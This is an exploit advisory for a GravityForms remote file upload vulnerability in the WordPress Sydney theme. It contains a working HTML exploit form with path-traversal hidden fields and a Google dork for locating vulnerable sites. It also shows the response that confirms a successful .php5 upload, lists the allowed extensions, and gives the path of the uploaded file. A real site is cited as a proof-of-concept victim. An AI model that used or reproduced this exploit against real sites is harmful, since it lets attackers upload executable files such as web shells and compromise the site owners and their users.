#################################################################################################

# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 08/06/2018
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>

<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

Exploit : TARGET/?gf_page=upload

We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter.

# Error :  {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

# Error [ Successful ] :  {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :  .html  .htm .php5 .txt  .jpg .gif .png  .html.fla  .phtml .pdf 

#  You don't need to change your filename as _input__kingskrupellos.php5 like this. 

# Just choose a file from your machine and upload it with the beforementioned extensions.  

# For example :  yourfilename.php file will upload to the server [ site ] like this.  /_input__kingskrupellos.php5

# Example Usage for Windows : 

# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP 

# 127.0.0.1/athemeswordpressexploiter.html

# Path :  TARGET/_input__kingskrupellos.php5

#################################################################################################

# Example Site =>  miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################